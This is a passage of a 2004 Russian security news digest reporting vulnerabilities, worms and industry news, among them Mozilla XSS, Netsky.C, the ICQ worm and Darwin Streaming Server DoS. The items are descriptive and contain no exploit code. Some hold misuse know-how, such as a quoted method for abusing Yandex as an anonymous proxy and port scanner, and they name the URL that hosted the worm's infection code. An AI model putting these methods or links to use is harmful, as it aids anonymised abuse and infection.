Найдена потенциальная уязвимость в cryptoloop модуле ядра, сообщается на linux.org.ru. При помощи известного открытого текста теоретически можно дешифровать данные на разделе. Возникает масса неприятных вопросов. Если cryptoloop уязвим, не нужно ли его заменить на dm_crypt? Насколько часто можно производить смену способов шифрования в ядре (и делать их все несовместимыми)? Что делать с "крипто"-уязвимостями, которые нельзя просто продемонстрировать на примере эксплойта?
Подробности - http://lwn.net/Articles/67216/

28/02/2004 14:51 Конкурс на взлом RAdmin.
Устав от слухов по поводу уязвимостей в популярной программе удаленного управления RAdmin, с которыми предположительно связывается ряд последних DDoS-атак, разработчики объявили конкурс на ее взлом. По адресу test.radmin.com установлен Remote Administrator server. Для всех желающих открыт порт 4899. Любой, кто утверждает, что в системе защиты программы имеется брешь, может попробовать подключиться к хосту и взломать пароль.
Подробности - http://www.bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=17&m=100457

28/02/2004 13:33 "Иммунная система" для PKI.
В сингапурском Институте инфокоммуникационных исследований (I2R) разработан механизм дополнительной защиты для систем, полагающихся на инфраструктуру открытого ключа. Технология получила название RCrypto. Она выполняет разбиение закрытой части ключа на несколько фрагментов, каждый из которых хранится на отдельном сервере. Полностью закрытый ключ никогда не воссоздается - система по фрагментам генерирует частичные сигнатуры и отдельные расшифрованные участки, объединяя результаты прозрачно для полагающегося на нее приложения. Для дальнейшего повышения защищенности в RCrypto предусмотрена функция периодического обновления фрагментарных ключей. В I2R считают, что RCrypto сможет найти применение в приложениях, использующих протокол SSL, который является фактическим стандартом защиты Internet-коммуникаций: решение обеспечит защиту закрытого ключа SSL даже в случае взлома сервера, на котором исполняется криптослужба. Архитектура RCrypto предусматривает функции балансировки нагрузки и отказоустойчивости.
Источник - http://www.osp.ru

28/02/2004 12:26 Вышла новая версия программы PrivacyKeyboard.
"Центр информационной безопасности", украинская компания-разработчик программных средств защиты информации, сообщила о выпуске версии 3.2 программы PrivacyKeyboard, предназначенной для защиты информации, обрабатываемой на ПК, от несанкционированно установленных программных продуктов, осуществляющих мониторинг действий пользователя на ПК с использованием функций перехвата нажатий клавиш на клавиатуре, текста из окон и графических снимков экрана. Более того, PrivacyKeyboard противодействует и работе аппаратных устройств, перехватывающих нажатия клавиш на клавиатуре. Характерной особенностью программы PrivacyKeyboard является использование не сигнатурных баз, а интеллектуальных алгоритмов, основанных на общих принципах, присущих всем типам мониторинговых программ, работающих на персональных компьютерах под управлением операционных систем Microsoft Windows NT/2000/XP. PrivacyKeyboard постоянно работает в фоновом режиме прозрачно для пользователя и обеспечивает защиту системы в реальном времени. Программу можно скачать для ознакомления.
Скачать - http://www.bezpeka.biz/download.html

28/02/2004 10:28 SOFT@Mail.Ru борется с пиратством.
Софтовый портал SOFT@Mail.Ru объявил о начале новой акции, направленной на борьбу с пиратством. Акция под названием "ПИРАТСТВУ БАНнер!" стартовала 25 февраля. В ее рамках будет проведен конкурс на лучший комплект баннеров, направленных против пиратства. По его итогам авторы трех лучших комплектов баннеров получат ценные призы. Участники конкурса должны будут создать оригинальный комплект баннеров, выполненных в едином стиле. Комплект должен состоять из трех баннеров размерами 468 x 60, 234 x 60 и 100 x 100 точек. Размеры баннеров должны быть не более 12, 7 и 4 кб соответственно. Из графических форматов можно использовать GIF, JPEG, или Macromedia Flash. Для подачи баннеров на конкурс нужно зарегистрироваться и отправить готовые работы через специальную форму. Крайний срок приема комплекта баннеров - 25 марта. С 26 марта по 4 апреля антипиратские баннеры будут демонстрироваться на сайте. Одновременно будет проводиться открытое голосование среди посетителей SOFT@Mail.Ru. По его итогам и будут выявлены победители конкурса. Кроме того, собственное мнение насчет лучшего комплекта баннеров выразят и организаторы. Победитель конкурса по версии жюри получит полную версию пакета для разработки веб-страниц Macromedia Studio MX 2004. В SOFT@Mail.Ru надеются, что акция "ПИРАТСТВУ БАНнер!" сыграет определенную роль в формировании отрицательного отношения общества к компьютерному пиратству.
Подробности - http://soft.mail.ru/news_page.php?id=18

27/02/2004 14:28 Очередная бета XP SP2.
Билд 2082 помимо известных ранее вещей, таких как изначально включенный файрволл, научившийся работать в режиме обучения, включает новый Security Center - централизованный интерфейс для управления антивирусным софтом, настройками файрволла и Windows Update, сообщается на сайте www.bugtraq.ru. Ожидается, что окончательная версия сервис-пака также будет включать Active Protection - "блокиратор поведения", нацеленный на ограничение распространения сетевых червей.
Подробности - http://www.microsoft-watch.com/article2/0,4248,1537327,00.asp

27/02/2004 12:21 Консорциум по безопасности Web-приложений.
В рамках всё той же, проходящей в Сан-Франциско конференции RSA было объявлено о создании Консорцциума по безопасности Web-приложений (Web Application Security Consortium - WASC). Цель проекта - содействие разработчикам Вэб-приложений при написании ПО, с целью обеспечения его максимальной безопасности, в частности, приложений, которые предназначены для осуществления электронной коммерциии, Интернет-магазинов, Интернет-аукционов, Web-почты и т.д. В косорциум вошли представители следующих компаний: Application Security, KaVaDo, Sanctum, SPI Dynamics, Inc., WhiteHat Security. Объявлено, что к активной работе Консорциум приступит в марте этого года.
Подробности - http://www.webappsec.org/

27/02/2004 11:18 Московские Ethernet-провайдеры отвечают "Стриму".
Как и предполагалось, запуск проекта "Стрим" компании "МТУ-Интел" резко обострил конкурентную ситуацию на московском рынке массового выделенного доступа. В качестве ответного шага многие ethernet-операторы объявили о снижении цен до такого же или более низкого уровня. С 1 марта "Орнет", предоставляющий доступ в Орехово-Борисово Северном, вводит тариф "Экстрим", - за 900 руб/мес абонентской платы пользователь получит 1 Гб трафика, а превышение будет тарифицироваться по 0.9 руб/Мб. Группу тарифов под тем же названием, и тоже с 1 марта, вводит сеть "VesNet", также входящая в холдинг "NetByNet". По тарифу "Экстрим-64" предлагается неограниченный доступ по каналу 64 Кбит/с за $25/мес; неограниченный доступ по каналу 32 Кбит/с на тарифе "Экстрим-32" обойдется абоненту в $15/мес, а на тарифе "Экстрим-Гигабайт" за абонентскую плату $30/мес пользователь получает 1 Гб входящего трафика, причем превышение тарифицируется по $0.03/Мб. О вводе с 1 марта новых тарифов объявила также сеть "Ultranet". Старший из входящих в семейство тарифных планов аналогичен тарифу "Стрим-Стандарт" (абонентская плата $29/мес, включая 1 Гб трафика; превышение по $0.03), в то время как другой тарифный план ориентирован на пользователей с меньшим объемом потребления, чьи потребности не учитываются "Стримом" (абонентская плата $19/мес включает 400 Мб трафика; превышение тарифицируется по $0.05/Мб). Компания "СУ-29 Телеком" объявила о вводе тарифного плана "Успех" - абонентская плата $58/мес включая 2000 Мб трафика; превышение по $0.025/Мб.
Подробнее - http://www.provider.net.ru/news.php?ts=1077789702

27/02/2004 10:35 Microsoft "перегружает" Windows XP.
В продолжение темы Windows. Представители корпорации Microsoft объявили о начале компании по продвижению на рынке ОС Windows XP, которая получила название «Windows XP Reloaded». Основная цель корпорации - не допустить длительной паузы в выпуске новых программных продуктов до завершения работы над новой OC Longhorn. Напомним, что релиз Windows XP состоялся в 2001 г., в то время как Longhorn не появится на рынке как минимум до 2006 г. Ряд экспертов утверждает, что Windows Reloaded будет промежуточным релизом Windows XP, однако представители корпорации отказываются дать новому продукту такую характеристику, тем не менее подтверждая что работы в этом направлении ведутся. Другие аналитики склоняются к версии о том, что будет выпущен пакет дополнений, который Microsoft может распространять как бесплатно, так и за деньги. Microsoft последовательно отрицает необходимость “промежуточного” выпуска Windows XP, но в условиях растущей конкуренции со стороны ОС Linux компании приходится корректировать свою политику. Так на 2004 г. уже запланирован выпуск пакета обновлений для Windows XP - небольшой апдейт должен устранить обнаруженные в работе операционной системы проблемы и повысить уровень ее безопасности. Аналитики отмечают, что большой временной промежуток между выпуском операционных систем может существенно ослабить позиции Microsoft в борьбе с Linux.
Источник - http://www.cnews.ru

27/02/2004 10:01 Microsoft придется выпустить "урезанную" версию Windows.
Вполне вероятно, корпорации Microsoft в ближайшее время придется выпустить "урезанные" версии последних операционных систем Windows, рассчитанные на использование в странах Европейского Союза. Об этом сообщает издание Infoworld со ссылкой на источники, имеющие непосредственное отношение к антимонопольному разбирательству против софтверного гиганта. Комиссия ЕС, напомним, намерена вынести решение по делу о нарушении антимонопольного законодательства корпорацией Microsoft в ближайшие четыре-шесть недель. Проблема связана с мультимедийным приложением Windows Media Player, которое в настоящее время входит в стандартную поставку ОС. По мнению сторонних производителей программного обеспечения, наличие медиаплеера в операционной системе снижает шансы разработчиков альтернативных пакетов на ведение честной конкурентной борьбы. В частности, кинокомпании и звукозаписывающие студии, зная, что на компьютере пользователя в любом случае установлен Windows Media Player, будут подстраиваться именно под этот плеер, игнорируя другие аналогичные программы. Поэтому не исключено, что Европейская комиссия вынудит софтверного гиганта выпустить специальную версию операционной системы с полностью удаленным медиаплеером.
Подробности - http://www.infoworld.com/article/04/02/24/HNECmicrosoftsell_1.html

27/02/2004 00:48 Windows Longhorn: новые подробности.
Новая операционная система от Microsoft будет следить за собой и защищать пользователей от нападений. Как пишет журнал PC World, операционная система Windows Longhorn будет снабжена детектором «нерегулярного поведения», который будет не только выискивать странности в паттернах сетевого трафика или использования памяти, но и самостоятельно устранять причины этой подозрительной активности. По крайней мере, примерно в таких словах описывал свое детище Билл Гейтс на проходящей в Сан-Франциско выставке RSA Conference. Как утверждает Гейтс, разработанная его компанией «система активной защиты» будет в состоянии самостоятельно защитить пользователя от внешней атаки, блокируя проникновение в его компьютер сетевых червей и вирусов. Помня о том, что самым слабым звеном любой системы является человек, в Longhorn встраивают систему «динамической защиты системы», которой придется следить за тем, какие патчи устанавливает пользователь. В случае, если компьютер зафиксирует атаку против еще не закрытой дырки, он закроет ее сам, причем – наглухо, запретив через встроенный брандмауэр любой доступ к своей ахиллесовой пяте.
Источник - http://www.internet.ru

26/02/2004 18:45 Пользователи мобильных технологий боятся вирусов, спама и хакеров.
Безопасность мобильных устройств беспокоит девять из десяти потребителей. Об этом свидетельствует исследование, проведенное в Японии компанией Network Associates. Владельцы гаджетов считают, что усовершенствование «умных» телефонов и PDA делает их все более уязвимыми к взломам и незаконным вторжениям. 88% пользователей серьезно опасаются за безопасность собственных устройств.
Стремление получить дополнительную защиту настолько глобально, что 52% респондентов согласны поменять привычного провайдера мобильной связи. 78% опрошенных хотели бы иметь функцию «родительского контроля» на аппаратах детей. Также сообщается, что 82% потребителей нуждаются в установлении блокировки нежелательных звонков, а 60% пользователей считают необходимым фильтрацию данных, которые приходят на мобильные телефоны.
Источник -http://www.runet.ru

26/02/2004 18:24 Выход NMAP 3.50.
Автор одного из самых знаменитых (и, пожалуй, лучших) сканеров - Nmap, господин с ником Fyodor сообщил широкому сетевому сообществу о выходе новой версии сканера - 3.50. Добавлений и исправлений довольно много, в частности - определение запущенного на порту сервиса, а также (при возможности) версии этого сервиса; естественно, расширена база определяемых ОС; усовершенствованы и улучшены версии сканера под Windows и MacOS X; в ответ на наезды SCO была убрана всякая поддержка ОС, выпускаемых этой конторой - OpenLinux, Skunkware, OpenServer, and UNIXWare (эдакий наш ответ Чемберлену ;)) и многое другое. Качаем, радуемся.
Подробности - http://www.insecure.org/nmap/

26/02/2004 17:10 Межсайтовый скриптинг в Mozilla.
Обнаружена уязвимость в популярном браузере Mozilla. Удаленный пользователь может выполнить XSS-нападение, сформировав HTML-документ, содержащий специально обработанную ссылку, который, когда будет загружен в браузере посетителя сайта (или при передаче через E-mail и просмотре почтовым агентом Mozilla), выполнит javascript код в контексте новой страницы. Уязвимость присутствует в 'nsDOMClassInfo.cpp' и происходит когда большое число обработчиков событий используется внутри HTML-тэгов. Кроме того, могут быть похищены важные системные данные (например, пароли). Уязвимость обнаружена Andreas Sandblad из Швеции. Уязвимости подвержены браузеры 1.6 и более ранние версии. На сайте производителя выпущен патч.
Подробности - http://bugzilla.mozilla.org/show_bug.cgi?id=227417

26/02/2004 15:23 Выход FreeBSD 5.2.1.
Вышла очередная версия ОС FreeBSD - 5.2.1, сообщает linux.org.ru. В основном включены исправления к версии 5.2: улучшена поддержка ATA/SATA; обновлен XFree 4.3; KUser (uз пакета KDEAdmin) теперь не разрушает базу пользователей (от RedHat заразились?); улучшена стабильность и безопасность.
Подробности - http://www.freebsd.org/releases/5.2.1R/relnotes.html

26/02/2004 15:16 Выход ASPLinux 9.2.
25 февраля компания ASPLinux объявляет о выходе новой версии своего дистрибутива — ASPLinux 9.2. На этот раз в дополнение к традиционным вариантам комплектации ASPLinux появился ASPLinux 9.2 Greenhorn, работающий прямо с CD-диска. ASPLinux 9.2 включает в себя программное обеспечение для офисной или домашней рабочей станции, сервера и рабочего места программиста. В дистрибутив был добавлен ряд новых пакетов, а также новые возможности, такие, как поддержка bluetooth, автоматическое определение подключаемых внешних устройств и др. Наиболее полная коробочная версия ASPLinux 9.2 Deluxe наилучшим образом подходит для корпоративного использования, ASPLinux 9.2 Standard призвана удовлетворить все потребности домашнего пользователя, простейший же вариант, ASPLinux 9.2 Express, предназначен для тех, кому не нужна литература или дополнительное ПО, например, для обновления системы. На дополнительных дисках в коробочных вариантах содержится набор пользовательских и серверных приложений. Среди них — комплект приложений, упрощающих процесс миграции компании или индивидуального пользователя на Linux — это пробные версии пакета CrossOver Office, предназначенного для запуска приложений для ОС Windows под Linux, виртуальных машин VMware и TwoOStwo, а также, в ASPLinux 9.2 Deluxe входит полная версия менеджера разделов жесткого диска и мультизагрузки операционных систем Acronis OS Selector 8.0.
Подробности - http://www.asplinux.ru/ru/pr/id,52695

26/02/2004 14:33 Появилась версия «С» червя Netsky.
Лаборатория PandaLabs зарегистрировала появление версии C червя Netsky (W32/Netsky.C.worm). Этот вредоносный код очень похож на своего предшественника, Netsky.B, который все еще заражает значительное количество компьютеров по всему миру. В последние дни Netsky.B является вирусом, наиболее часто обнаруживаемым бесплатной онлайновой программой Panda ActiveScan. Netsky.C попадает на компьютеры в электронном сообщении, тема, текст и вложенный файл которого выбираются случайным образом из имеющегося списка. Для ознакомления с данным списком обратитесь к Вирусной энциклопедии Panda Software. После запуска вложенного файла Netsky.C копирует себя на все диски компьютера под именем WINLOGON.EXE. При помощи собственного SMTP механизма червь рассылает себя по всем адресам, обнаруженным им в файлах с расширениями .eml, .txt, .php, .pl, .htm, .html, .vbs, .rtf, .uin, .asp, .wab, .doc, .adb, .tbb, .dbx, .sht, .oft, .msg, .shtm, .cgi, и .dhtm, хранящихся на компьютере. Кроме того, червь копирует себя под различными именами во все папки на компьютере, имена которых содержат надпись ‘shar’. Таким образом, он распространяется через программы обмена файлами, такие как KaZaA. В период с 6 часов утра до 8 часов 59 минут 26 февраля Netsky.C воспроизводил специфические звуки через динамики зараженного компьютера. Наконец, червь добавляет некоторые записи в Реестр Windows для обеспечения своего запуска при каждой загрузке системы. Также он удаляет все записи других вредоносных кодов, например, Mydoom.A и Mimail.T.
Источник - http://www.viruslab.ru

26/02/2004 14:11 AOL блокировала распространение ICQ-червя Bizex.
Распространение вируса Bizex по каналам сети мгновенного обмена сообщениями ICQ прекращено. Сообщение об этом появилось на официальном сайте интернет-пейджера www.icq.com. В настоящее время сетью ICQ владеет AOL - интернет-подразделение медиагиганта Time Warner. Для пресечения распространения вируса специалисты AOL внесли изменения в конфигурацию серверов, управляющих передачей сообщений. Никаких патчей для конечных пользователей выпущено не было: в AOL утверждают, что никаких заплаток вообще не требуется. Более того, владельцы ICQ утверждают, что от вируса пострадало "небольшое число пользователей". Вместе с тем, по оценкам "Лаборатории Касперского" за первые часы эпидемии вирусом Bizex были заражены свыше 50 тысяч компьютеров. В AOL утверждают, что уязвимым для атаки является только клиент ICQ Pro. Пользователи ICQ Lite и альтернативных пейджеров вроде Miranda могут быть спокойны. Не опасен вирус и для тех, кто вовремя устанавливает все заплатки для Windows. В настоящее время в AOL продолжают работать над тем, как помочь пользователям, до сих пор испытывающим проблемы, вызванные вирусом. Пока, впрочем, конкретных результатов этой работы не представлено. Владельцы ICQ также рекомендуют использовать и регулярно обновлять антивирусные программы, поскольку "черви и вирусы - это обычная проблема интернета".
Подробности - http://www.icq.com/support/security/update.html

26/02/2004 13:51 Сформирован альянс по обеспечению кибербезопасности.
В ходе конференции RSA, проходящей в эти дни в Сан-Франциско, штат Калифорния, было объявлено о формировании Альянса по обеспечению кибербезопасности (Cyber Security Industry Alliance, CSIA), сообщает "Компьюлента". Основные усилия новой некоммерческой организации будут направлены на снижение количества сетевых преступлений. На сегодняшний день в состав альянса входят двенадцать крупных компаний, чья деятельность так или иначе связана с вопросами безопасности - это компании BindView, Check Point Software Technologies, Computer Associates International, Entrust, Internet Security Systems, NetScreen Technologies, Network Associates, PGP, Qualys, RSA Security, Secure Computing и Symantec. Возглавит группу Пол Курц, занимавший до последнего времени должность специального помощника президента США и директора подразделения по защите критически важной инфраструктуры страны, входящего в состав Совета по вопросам внутренней безопасности.
Подробности - http://www.csialliance.org/

25/02/2004 17:59 Уязвимость в Apache for cygwin.
Jeremy Bae из SSR Team обнаружил уязвимость в Вэб-сервере Apache для среды cigwin (некая попытка организации среды UNIX в MS). Используя уязвимость, удалённый атакующий может посмотреть содержимое произвольных файлов (то, что на буржуйском языке называется directory traversal). Производителем (Stipe Tolj) выпустил патч для версии 1.3.29, однако версии 2.* по-прежнему подвержены уязвимости.
Подробности - http://www.securityfocus.com/archive/1/355013/2004-02-22/2004-02-28/0

25/02/2004 17:39 Уязвимость в Darwin Streaming Server.
Вслед за @stake отметилась и iDEFENSE, которая также обнаружила ещё одну уязвимость в технологии Apple под названием Darwin Streaming Server, которая предназначена для поддержания потоковой передачи данных QuickTime к клиентам через Интернет с использованием протоколов RTP и RTSP. Было обнаружено, удалённый пользователь может вызвать DoS, что позволяет привести к неработоспособности службы сервера. Уязвимость существует в механизме обработки запроса DESCRIBE. Для проведения атаки необходимо софрмировать специальное поле User-Agent, которое должно быть больше 255 символов. Компанией выпущен эксплоит. Apple, соответственно, выпустила со своей стороны обновление Security Update 2004-02-23, доступное для версий Mac OS X 10.3.2 Server и Mac OS X 10.2.8 Server.
Подробности - http://www.idefense.com/application/poi/display?id=75

25/02/2004 17:20 Уязвимость в Mac OS X.
Известная компания по исследованию компьютерной безопасности @stake, Inc. сообщает об уязвимости в пакете pppd в ОС Mac OS X, который инсталлируется по умолчанию (демон для организации диал-ап доступа по протоколу PPP). Уязвимость типа формата строки обнаружена в одной из функций pppd - option_error __V(). Наличие уязвимости не позволяет использовать традиционный в подобных случаях метод выполнения произвольного кода в пространстве памяти процесса, однако, позволяет локальному пользователю получить информацию о "секретах" (credentials) аутентификации с использованием PAP/CHAP. уязвимость обнаружена в версии до Mac OS X 10.3.2 в версии pppd 2.4.0. Производителем (Apple) выпущено обновление Security Update 2004-02-23 for Mac OS X 10.3.2 и Mac OS X 10.2.8. Естественно, уязвимость актуальна в случае организации PPP-сервера.
Подробности - http://www.atstake.com/research/advisories/2004/a022304-1.txt

25/02/2004 17:14 Очередной анализ ICQ-червя.
На сей раз подробнейший и очень качественный анализ был выполнен господином Rafel Ivgi из Израиля. Добавлена информация о ключах автозапуска, имена файлов, которые прописывает червь. Приведён сам код червя и т.д. Кстати, сам код червя написан на Вижуал Басике.
Анализ - http://www.securityfocus.com/archive/1/355098/2004-02-22/2004-02-28/0

25/02/2004 16:39 AMD выпустила встраиваемый криптографический процессор.
Вчера AMD выпустила новый встраиваемый процессор серии Alchemy - Au1550 - для приложений сетевой безопасности. На чипе, созданном на базе предшественника - Alchemy Au1500, реализованы протоколы IPsec, SSL для виртуальных частных сетей и генератор случайных чисел. Кроме того, чип имеет так называемый движок безопасности, в котором реализованы криптографические алгоритмы DES, 3DES, AES, ARC-4, SHA-1 и MD5. Процессор может одновременно поддерживать неограниченное количество VPN-туннелей, что стало возможным за счет использования технологии компании SafeNet. В свою очередь, чип поддерживает библиотеки процедур CGX Mobile Library от этой компании. На чипе имеется встроенный контроллер памяти, поддерживающий до 400 МГц DDR SDRAM, а также флэш-память типа NOR и NAND, а также CompactFlash и PC Card. Рабочая потребляемая мощность - 0,5 Вт, питание от батарей или Ethernet-кабеля. Образцы процессора с тактовыми частотами 333, 400 и 500 МГц уже продаются по цене $21,26, $26,57 и $33,75 соответственно при покупке партии от 10 тыс. штук. Во втором квартале начнется их промышленное производство.
Источник - http://www.cnews.ru

25/02/2004 16:06 Microsoft портирует Windows Media Player на ОС Linux.
Ранее на этой неделе Microsoft без широкой огласки сообщила, что выбрала InterVideo, разработчика мультимедийного проигрывателя, для портирования ее продукта Windows Media на операционную систему Linux для использования в потребительской электронике, такой, как персональные видеомагнитафоны. Что ничуть не удивительно, пользователи скачивать версию Windows Media Player для Linux не смогут. Полученная технология будет доступна только для производителей для встраивания в готовые продукты.
Источник - http://www.nixp.ru

25/02/2004 15:31 3GSM: Новая версия SymbianOS.
Компания Symbian представила на Конгрессе 3GSM в Каннах новую версию своей операционной системы для портативных устройств. Главным нововведением в SymbianOS стало совершенно новое ядро реального времени, cообщает "Компьюлента". Новое ядро позволяет использовать ОС в новом поколении телефонов, использующих процессоры, объединяющие на одном ядре функции связи и обработки информации. В новой версии операционной системы заложена поддержка последних моделей процессоров, памяти и периферийных устройств. Особого внимания заслуживает появившаяся в SymbianOS 8 поддержка аппаратных мультимедийных ускорителей, которые постепенно завоевывают все более заметное место на рынке. Кроме этого, в новой версии SymbianOS поддерживаются функции удаленной настройки телефонов, для чего используется стандарт OMA SyncML 1.1. Наконец, операционная система получила поддержку карт расширения формата SDIO. Значительно улучшена в SymbianOS 8 и реализация поддержки Java, что немаловажно, учитывая быстрое распространение мобильных Java-приложений. Теперь ОС от Symbian поддерживает такие стандарты как Java MIDP 2.0, CLDC1.1, Java MobileMedia, Java 3D graphics, JTWI 1.0 и другие. Система поддерживает все основные мобильные и интернет-стандарты обмена сообщениями, включая MMS, EMS, HTTP 1.1, WAP, почтовые протоколы SMTP, POP3, IMAP4 и т.д. Операционная система может использоваться с несколькими вариантами интерфейса, включая Nokia Series 60 и UIQ. При этом, благодаря поддержке Unicode, система может быть локализована для самых разных регионов мира. Нельзя не отметить и поддержку шифрования на базе алгоритмов DES, 3DES, RC2, RC4, RC5 и AES, возможность управления сертификатами безопасности X509, WTLS, поддержку протоколов SSL/TLS/WTLS и клиентов IPSec и VPN.
Подробнее - http://www.symbian.com/technology/symbos-v8x-det.html

25/02/2004 14:38 Уязвимость Yandex или Yandex proxy.
На форуме "Уязвимости и эксплоиты" господин с ником Phoenix опубликовал обнаруженную им уязвимость в yandex.ru. Как пишет автор, "Всем известный яндекс может использоваться как ПОЛНОСТЬЮ анонимный прокси сервер. Точнее анонимайзер.
И так, теперь предыстория. Заходим на яндекс. делаем поиск по любому слову. Что видим интерестного? Я тоже ничего не видел, хотя яндексом пользовался каждый день. И очень долго. А ведь эта самая интерестность раз 20 на странице написана.
Вот она: "найденные слова" Жмем на нее. И первое что бросается в глаза - это баннер сверху, о том что яндекс не имеет никакого отношения к этой странице, и предложение посмотреть СОХРАНЕННУЮ КОПИЮ. тааак. А это получается копия, которая не сохраненная, а полученная в реальном времени. Т.е. янджекс запросил подставленную страницу, и благополучно выдал на результат! чем не прокси? Осталось только предположение что яндекс отдает только сохраненные и проиндексированные страницы. Но просым эксперементом было доказано обратное. ЯНДЕКС ОТДАЕТ НАМ ТЕКСТ ЛЮБОЙ СТРАНИЦЫ, АДРЕС КОТОРОЙ МЫ ПЕРЕДАЛИ В ПЕРЕМЕННОЙ URL" (прим. ньюсмейкера - сообщение чуть подредактировано мной). Более того, yandex.ru также можно использовать для сканирования портов удалённых серверов (правда, с некоторыми оговорками).
Подробности - http://forum.securitylab.ru/forum_posts.asp?TID=8350&PN=1

25/02/2004 13:56 Microsoft организует фонд борьбы с вирусописателями.
В рамках проведенного в Лондоне (Великобритания) конгресса по вопросам компьютерной безопасности корпорация Microsoft объявила о создании специального фонда, средства из которого будут направлены на борьбу с авторами вредоносных программ. На сегодняшний день денежные активы фонда составляют пять миллионов долларов США, передает CNet Asia. Получить эти средства может любой, кто предоставит достоверную информацию, ведущую к поимке наиболее злостных вирусописателей. Речь идет, прежде всего, об авторах вирусов MSBlast, Sobig-F и MyDoom.B. Эти вредоносные программы стали причиной глобальных вирусных эпидемий, от которых пострадали сотни тысяч пользователей операционных систем Windows. А червь MyDoom.B, ко всему прочему, еще и пытался устроить распределенную DoS-атаку на сайт Microsoft. Поэтому неудивительно, что софтверный гигант, как никто другой, заинтересован в поимке хакеров. Кроме того, по словам представителей Microsoft, сведения, собираемые корпорацией, используются несколькими крупными правительственными агентствами по всему миру с целью поиска киберпреступников.
Подробности - http://asia.cnet.com/newstech/security/0,39001150,39169523,00.htm

25/02/2004 13:24 Microsoft седлает «Белую лошадь».
В этом году Microsoft попытается оторваться от Java-конкурентов, предложив инструменты, упрощающие разработку и эксплуатацию бизнес-ПО. Как сообщил CNET News.com главный продакт-менеджер отделения разработки Microsoft Прашант Шридхаран, в середине года компания предложит опытную версию нового инструмента с кодовым названием Whitehorse, который поможет программистам проектировать и создавать более надежные Windows-приложения за более короткое время. Whitehorse станет частью будущей редакции комплекса инструментов разработки Microsoft Visual Studio.Net с кодовым названием Whidbey, который планируется выпустить к концу этого года. По словам Шридхарана, Whitehorse обеспечит визуальное представление создаваемого ПО. Такие инструменты «моделирования» не новы, но среди Windows-программистов они пока не получили широкого распространения. «Whitehorse позволит нанести на схему сервисы, подсоединить их и наложить протоколы, скажем, транзакций и защиты», — пояснил Шридхаран. Хотя подобный инструментарий может показаться экзотикой, на самом деле это краеугольный камень стратегии разработки ПО Microsoft. Whitehorse дополнит новую версию Windows Longhorn и позволит разработчикам связывать разные приложения с применением веб-сервисов. Они смогут создавать более сложные системы, а Microsoft — заключать более крупные контракты и встать, таким образом, на один уровень с Java-конкурентами — IBM, Sun Microsystems и Oracle, обслуживая самых взыскательных заказчиков. Не менее важно намерение Microsoft использовать Whitehorse и внутри компании, что должно повысить надежность ее собственных продуктов (примечание ньюсмейкера - свежо предание...).
Подробности - http://www.zdnet.ru/?ID=427284

25/02/2004 12:06 И ещё о новом ICQ-черве.
На сайте с красноречивым названием daemonology.net опубликована хронология реагирования основных антивирусных компаний на появление нового червя, использующего ICQ для своего распространения и первичного заражения компьютера жертвы. Совершенно очевидно, что код заражения находится на странице, на которую ведёт ссылка - http://www.jokeworld.biz/index.html, при этом используется уязвимость, ранее обнаруженная в ICQ и опубликованная на сайте icqinfo.ru. Cуть уязвимости - в механизме формирования звуковой схемы ICQ. Для маскировки пользователю показываются мультфильмы из популярного сериала Joecartoon. При этом на компьютер пользователя, используя известную "дыру" в ICQ, загружается троянская программа, которая незаметно рассылает от имени владельца компьютера ссылку на опасный сайт всем получателям из контакт-листа. Кроме того, по данным "Лаборатории Касперского", в главном компоненте червя заложена функция, позволяющая автору получать реквизиты платежной системы E-Gold. Заражение компьютера возможно только при совместном использовании "сладкой парочки" ICQ+IE. Как происходит заражение и технология лечения описаны на ссыллке, приведённой ниже.
Уязвимость ICQ - http://www.icqinfo.ru/bug_sound.shtml
Описание червя - http://www.daemonology.net/ICQworm/worm.txt

24/02/2004 14:45 IBM строит второй суперкомпьютер Blue Gene.
Суперкомпьютер Blue Gene/L будет задействован в проекте по созданию нового радиотелескопа Lofar (от low frequency array) для института Astron в Нидерландах. Система производительностью свыше 30 трлн операций в секунду на базе операционной системы Linux и около 12 тыс. процессоров должна быть готова в 2005 году. IBM отказалась от комментариев до выхода официального пресс-релиза, но на веб-сайте Lofar говорится, что в ноябре Astron подписала договор о намерениях по использованию Blue Gene для телескопа, и что суперкомпьютер Lofar открывает возможности для совместных исследований и разработок IBM и Astron. Самая быстродействующая на сегодняшний день вычислительная машина, NEC Earth Simulator, построенная в 2002 году, выполняет 35,6 трлн операций в секунду, но с появлением Blue Gene/L и нескольких других систем, пополнивших банк суперкомпьютерных генов, конкуренция обостряется. В число других машин, перекраивающих список самых быстродействующих суперкомпьютеров мира, входят система Политехнического института и университета штата Вирджиния, состоящая из 1100 двухпроцессорных машин Apple Computer на базе чипов IBM PowerPC 970, и система Лос-Аламосской национальной лаборатории с 2816 процессорами AMD Opteron. Скоро в гонку включится еще один чип: в четверг компания Linux Networx анонсировала контракт с Научно-исследовательской лабораторией армии США на поставку системы на 2132 процессорах Xeon, 1066 из которых снабжены только что анонсированной Intel 64-разрядной технологией СТ. Эта технология, аналогичная той, что применяется в процессорах AMD Opteron, должна появиться в июне в моделях Xeon с кодовым названием Nocona.
Подробности - http://zdnet.com.com/2100-1103_2-5162741.html

24/02/2004 14:10 SCO запускает онлайновый сервис по продаже лицензий на Linux.
Компания SCO запустила специализированную онлайновую службу, посредством которой пользователи Linux могут приобрести лицензии на операционную систему, не выходя из дома. Стоимость лицензий установлена на следующем уровне:
Однопроцессорный сервер с Linux - 699 долларов США
Двухпроцессорный сервер с Linux - 1149 долларов США
Четырехпроцессорный сервер с Linux - 2499 долларов США
Восьмипроцессорный сервер с Linux - 4999 долларов США
Один дополнительный процессор - 749 долларов США
Настольный компьютер с Linux - 199 долларов США
Нормальные такие цены для БЕСПЛАТНОЙ (!) ОС, не находите? Если всё же кто-то решит зарегистрироваться, внизу приведена ссылка. ;))
Подробности - http://shop.sco.com/caldera/summary.jsp?collection=Scosource

24/02/2004 13:06 Обнаружен новый вариант червя MyDoom.
